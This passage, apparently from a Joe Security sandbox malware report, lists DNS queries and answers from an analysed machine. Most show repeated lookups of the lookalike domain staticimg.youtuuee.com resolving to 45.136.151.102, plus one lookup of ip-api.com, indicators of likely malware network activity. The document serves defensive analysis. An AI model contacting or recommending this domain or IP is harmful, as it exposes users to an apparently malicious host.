Oct 24, 2021 09:47:43.974478006 CEST 192.168.2.5 8.8.8.8 0xcad7 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:44.910770893 CEST 192.168.2.5 8.8.8.8 0xa550 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:45.529999971 CEST 192.168.2.5 8.8.8.8 0x5f42 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:46.144649029 CEST 192.168.2.5 8.8.8.8 0xbac4 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:46.771471977 CEST 192.168.2.5 8.8.8.8 0x3771 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:47.387002945 CEST 192.168.2.5 8.8.8.8 0x7f47 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:47.994390965 CEST 192.168.2.5 8.8.8.8 0xf56e Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:48.600059986 CEST 192.168.2.5 8.8.8.8 0x360d Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:49.206872940 CEST 192.168.2.5 8.8.8.8 0x911c Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:49.799350977 CEST 192.168.2.5 8.8.8.8 0xfd3 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:50.410588980 CEST 192.168.2.5 8.8.8.8 0xe416 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:51.041132927 CEST 192.168.2.5 8.8.8.8 0xecad Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:51.645896912 CEST 192.168.2.5 8.8.8.8 0x5b5 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:52.257523060 CEST 192.168.2.5 8.8.8.8 0x36f Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:52.875586033 CEST 192.168.2.5 8.8.8.8 0x68de Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:53.473479033 CEST 192.168.2.5 8.8.8.8 0xf293 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:54.089143038 CEST 192.168.2.5 8.8.8.8 0x69a3 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:54.719775915 CEST 192.168.2.5 8.8.8.8 0x4eac Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:55.327100992 CEST 192.168.2.5 8.8.8.8 0xe83f Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:55.954521894 CEST 192.168.2.5 8.8.8.8 0xcc66 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:56.558793068 CEST 192.168.2.5 8.8.8.8 0xb24f Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:57.189415932 CEST 192.168.2.5 8.8.8.8 0xff Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:57.818434000 CEST 192.168.2.5 8.8.8.8 0xdca Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:58.437071085 CEST 192.168.2.5 8.8.8.8 0xcdaa Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:59.060106039 CEST 192.168.2.5 8.8.8.8 0x6f1c Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:47:59.656584978 CEST 192.168.2.5 8.8.8.8 0xcd41 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:48:00.264033079 CEST 192.168.2.5 8.8.8.8 0x7608 Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:48:00.877664089 CEST 192.168.2.5 8.8.8.8 0x825b Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:48:01.487720013 CEST 192.168.2.5 8.8.8.8 0xcc3a Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Oct 24, 2021 09:48:02.112385035 CEST 192.168.2.5 8.8.8.8 0x95a Standard query (0)
staticimg.youtuuee.com
A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Oct 24, 2021 09:46:11.976222992 CEST
8.8.8.8 192.168.2.5 0x9eb8 No error (0) ip-api.com 208.95.112.1 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:12.482688904 CEST
8.8.8.8 192.168.2.5 0x70c5 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
DNS Answers
Copyright Joe Security LLC 2021 Page 18 of 58
Oct 24, 2021 09:46:13.740453959 CEST
8.8.8.8 192.168.2.5 0xe681 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:14.915924072 CEST
8.8.8.8 192.168.2.5 0x31f3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:15.947504997 CEST
8.8.8.8 192.168.2.5 0xe589 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:17.197069883 CEST
8.8.8.8 192.168.2.5 0x9dac No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:18.367758036 CEST
8.8.8.8 192.168.2.5 0x8498 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:19.863547087 CEST
8.8.8.8 192.168.2.5 0x84fe No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:21.295439005 CEST
8.8.8.8 192.168.2.5 0x8a28 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:22.591523886 CEST
8.8.8.8 192.168.2.5 0xe2c7 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:23.921989918 CEST
8.8.8.8 192.168.2.5 0x64d7 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:25.463247061 CEST
8.8.8.8 192.168.2.5 0xdace No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:26.984664917 CEST
8.8.8.8 192.168.2.5 0x6af1 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:28.622839928 CEST
8.8.8.8 192.168.2.5 0x5c0b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:30.084511042 CEST
8.8.8.8 192.168.2.5 0xed9f No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:31.772547960 CEST
8.8.8.8 192.168.2.5 0xa4a9 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:33.425863028 CEST
8.8.8.8 192.168.2.5 0xe6d1 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:34.912228107 CEST
8.8.8.8 192.168.2.5 0xccc3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:36.402184963 CEST
8.8.8.8 192.168.2.5 0xde90 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:37.854722977 CEST
8.8.8.8 192.168.2.5 0x3d9 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:39.137234926 CEST
8.8.8.8 192.168.2.5 0x2d99 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:40.732676983 CEST
8.8.8.8 192.168.2.5 0x4bb7 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:42.003353119 CEST
8.8.8.8 192.168.2.5 0x1393 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:43.150230885 CEST
8.8.8.8 192.168.2.5 0x493e No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:43.770291090 CEST
8.8.8.8 192.168.2.5 0x37a8 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:44.410131931 CEST
8.8.8.8 192.168.2.5 0x449d No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:45.035528898 CEST
8.8.8.8 192.168.2.5 0xc73e No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:45.675551891 CEST
8.8.8.8 192.168.2.5 0x9934 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Copyright Joe Security LLC 2021 Page 19 of 58
Oct 24, 2021 09:46:46.313957930 CEST
8.8.8.8 192.168.2.5 0xb8ed No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:46.943269014 CEST
8.8.8.8 192.168.2.5 0x34f7 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:47.591645002 CEST
8.8.8.8 192.168.2.5 0x367c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:48.245228052 CEST
8.8.8.8 192.168.2.5 0x81a9 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:48.868161917 CEST
8.8.8.8 192.168.2.5 0xbe8f No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:49.503611088 CEST
8.8.8.8 192.168.2.5 0x8469 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:50.135504961 CEST
8.8.8.8 192.168.2.5 0x23af No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:50.767919064 CEST
8.8.8.8 192.168.2.5 0x35c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:51.395010948 CEST
8.8.8.8 192.168.2.5 0x82eb No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:52.018250942 CEST
8.8.8.8 192.168.2.5 0xabd4 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:52.646979094 CEST
8.8.8.8 192.168.2.5 0x7d96 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:53.274059057 CEST
8.8.8.8 192.168.2.5 0xa1d4 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:53.904247999 CEST
8.8.8.8 192.168.2.5 0x82e6 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:54.530499935 CEST
8.8.8.8 192.168.2.5 0x4eba No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:55.171437979 CEST
8.8.8.8 192.168.2.5 0x29fb No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:55.796912909 CEST
8.8.8.8 192.168.2.5 0xb16d No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:56.437997103 CEST
8.8.8.8 192.168.2.5 0x187d No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:57.103617907 CEST
8.8.8.8 192.168.2.5 0x74ac No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:57.732459068 CEST
8.8.8.8 192.168.2.5 0xbf1d No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:58.361526012 CEST
8.8.8.8 192.168.2.5 0x9bba No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:58.979845047 CEST
8.8.8.8 192.168.2.5 0x42ad No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:46:59.605251074 CEST
8.8.8.8 192.168.2.5 0x800d No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:00.254426003 CEST
8.8.8.8 192.168.2.5 0x654a No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:00.873423100 CEST
8.8.8.8 192.168.2.5 0x1137 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:01.506788015 CEST
8.8.8.8 192.168.2.5 0x1ba No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:02.126943111 CEST
8.8.8.8 192.168.2.5 0x9dae No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Copyright Joe Security LLC 2021 Page 20 of 58
Oct 24, 2021 09:47:02.734566927 CEST
8.8.8.8 192.168.2.5 0xd880 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:03.373521090 CEST
8.8.8.8 192.168.2.5 0xc520 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:04.008299112 CEST
8.8.8.8 192.168.2.5 0x6619 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:04.630717039 CEST
8.8.8.8 192.168.2.5 0xa0c7 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:05.252378941 CEST
8.8.8.8 192.168.2.5 0xded4 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:05.897815943 CEST
8.8.8.8 192.168.2.5 0xc7b8 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:06.542243958 CEST
8.8.8.8 192.168.2.5 0xe70a No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:07.151657104 CEST
8.8.8.8 192.168.2.5 0xa97e No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:07.784101963 CEST
8.8.8.8 192.168.2.5 0xe8de No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:08.405812979 CEST
8.8.8.8 192.168.2.5 0x8d83 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:09.020821095 CEST
8.8.8.8 192.168.2.5 0x30ae No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:09.643799067 CEST
8.8.8.8 192.168.2.5 0x4a01 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:10.266096115 CEST
8.8.8.8 192.168.2.5 0x6280 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:10.980098009 CEST
8.8.8.8 192.168.2.5 0xdb87 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:11.975509882 CEST
8.8.8.8 192.168.2.5 0x197e No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:13.248315096 CEST
8.8.8.8 192.168.2.5 0x31c7 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:13.916690111 CEST
8.8.8.8 192.168.2.5 0x22e5 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:14.525177002 CEST
8.8.8.8 192.168.2.5 0x9cba No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:15.129575014 CEST
8.8.8.8 192.168.2.5 0xac31 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:15.741206884 CEST
8.8.8.8 192.168.2.5 0xc91 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:16.380837917 CEST
8.8.8.8 192.168.2.5 0xbb6 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:16.999514103 CEST
8.8.8.8 192.168.2.5 0xd77c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:17.613404989 CEST
8.8.8.8 192.168.2.5 0x6291 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:18.568649054 CEST
8.8.8.8 192.168.2.5 0x852f No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:19.185070038 CEST
8.8.8.8 192.168.2.5 0x57a2 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:19.797535896 CEST
8.8.8.8 192.168.2.5 0xc556 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Copyright Joe Security LLC 2021 Page 21 of 58
Oct 24, 2021 09:47:20.399183989 CEST
8.8.8.8 192.168.2.5 0x46f3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:21.013571978 CEST
8.8.8.8 192.168.2.5 0xf185 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:21.621269941 CEST
8.8.8.8 192.168.2.5 0x1604 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:22.251352072 CEST
8.8.8.8 192.168.2.5 0x94b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:22.899736881 CEST
8.8.8.8 192.168.2.5 0x47d3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:23.521917105 CEST
8.8.8.8 192.168.2.5 0xf03d No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:24.131295919 CEST
8.8.8.8 192.168.2.5 0xc178 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:24.780937910 CEST
8.8.8.8 192.168.2.5 0x3452 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:25.413681030 CEST
8.8.8.8 192.168.2.5 0xcb54 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:26.027328968 CEST
8.8.8.8 192.168.2.5 0xcbc1 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:26.631810904 CEST
8.8.8.8 192.168.2.5 0xcd1c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:27.253463030 CEST
8.8.8.8 192.168.2.5 0xbda2 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:27.865590096 CEST
8.8.8.8 192.168.2.5 0xc3e3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:28.457813978 CEST
8.8.8.8 192.168.2.5 0xd6db No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:29.146256924 CEST
8.8.8.8 192.168.2.5 0x54b1 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:29.783416033 CEST
8.8.8.8 192.168.2.5 0x7045 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:30.829247952 CEST
8.8.8.8 192.168.2.5 0x38d8 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:32.173935890 CEST
8.8.8.8 192.168.2.5 0xc19c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:32.807846069 CEST
8.8.8.8 192.168.2.5 0xa789 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:33.433953047 CEST
8.8.8.8 192.168.2.5 0xd6e6 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:34.074692965 CEST
8.8.8.8 192.168.2.5 0x829b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:34.699784040 CEST
8.8.8.8 192.168.2.5 0x7737 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:35.329610109 CEST
8.8.8.8 192.168.2.5 0xa830 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:35.929393053 CEST
8.8.8.8 192.168.2.5 0x9192 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:36.531472921 CEST
8.8.8.8 192.168.2.5 0x8a43 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:37.161864996 CEST
8.8.8.8 192.168.2.5 0x9f3b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Copyright Joe Security LLC 2021 Page 22 of 58
Oct 24, 2021 09:47:37.784832954 CEST
8.8.8.8 192.168.2.5 0xa3aa No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:38.405206919 CEST
8.8.8.8 192.168.2.5 0x84a2 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:39.014890909 CEST
8.8.8.8 192.168.2.5 0x4745 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:39.629781961 CEST
8.8.8.8 192.168.2.5 0xed77 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:40.251389027 CEST
8.8.8.8 192.168.2.5 0x1158 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:40.867505074 CEST
8.8.8.8 192.168.2.5 0x44a0 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:41.505384922 CEST
8.8.8.8 192.168.2.5 0x96c0 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:42.125135899 CEST
8.8.8.8 192.168.2.5 0x5c7b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:42.746428013 CEST
8.8.8.8 192.168.2.5 0x461b No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:43.370395899 CEST
8.8.8.8 192.168.2.5 0x9a08 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:43.990777969 CEST
8.8.8.8 192.168.2.5 0xcad7 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:44.929102898 CEST
8.8.8.8 192.168.2.5 0xa550 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:45.547961950 CEST
8.8.8.8 192.168.2.5 0x5f42 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:46.162534952 CEST
8.8.8.8 192.168.2.5 0xbac4 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:46.789660931 CEST
8.8.8.8 192.168.2.5 0x3771 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:47.404970884 CEST
8.8.8.8 192.168.2.5 0x7f47 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:48.012718916 CEST
8.8.8.8 192.168.2.5 0xf56e No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:48.618808985 CEST
8.8.8.8 192.168.2.5 0x360d No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:49.225338936 CEST
8.8.8.8 192.168.2.5 0x911c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:49.817647934 CEST
8.8.8.8 192.168.2.5 0xfd3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:50.428714991 CEST
8.8.8.8 192.168.2.5 0xe416 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:51.059173107 CEST
8.8.8.8 192.168.2.5 0xecad No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:51.661578894 CEST
8.8.8.8 192.168.2.5 0x5b5 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:52.275777102 CEST
8.8.8.8 192.168.2.5 0x36f No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:52.893830061 CEST
8.8.8.8 192.168.2.5 0x68de No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:53.489969015 CEST
8.8.8.8 192.168.2.5 0xf293 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Copyright Joe Security LLC 2021 Page 23 of 58
Oct 24, 2021 09:47:54.106935024 CEST
8.8.8.8 192.168.2.5 0x69a3 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:54.737811089 CEST
8.8.8.8 192.168.2.5 0x4eac No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:55.344943047 CEST
8.8.8.8 192.168.2.5 0xe83f No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:55.972354889 CEST
8.8.8.8 192.168.2.5 0xcc66 No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:56.577006102 CEST
8.8.8.8 192.168.2.5 0xb24f No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:57.207375050 CEST
8.8.8.8 192.168.2.5 0xff No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:57.836489916 CEST
8.8.8.8 192.168.2.5 0xdca No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:58.454911947 CEST
8.8.8.8 192.168.2.5 0xcdaa No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
Oct 24, 2021 09:47:59.077966928 CEST
8.8.8.8 192.168.2.5 0x6f1c No error (0) staticimg.youtuuee.com
45.136.151.102 A (IP address) IN (0x0001)
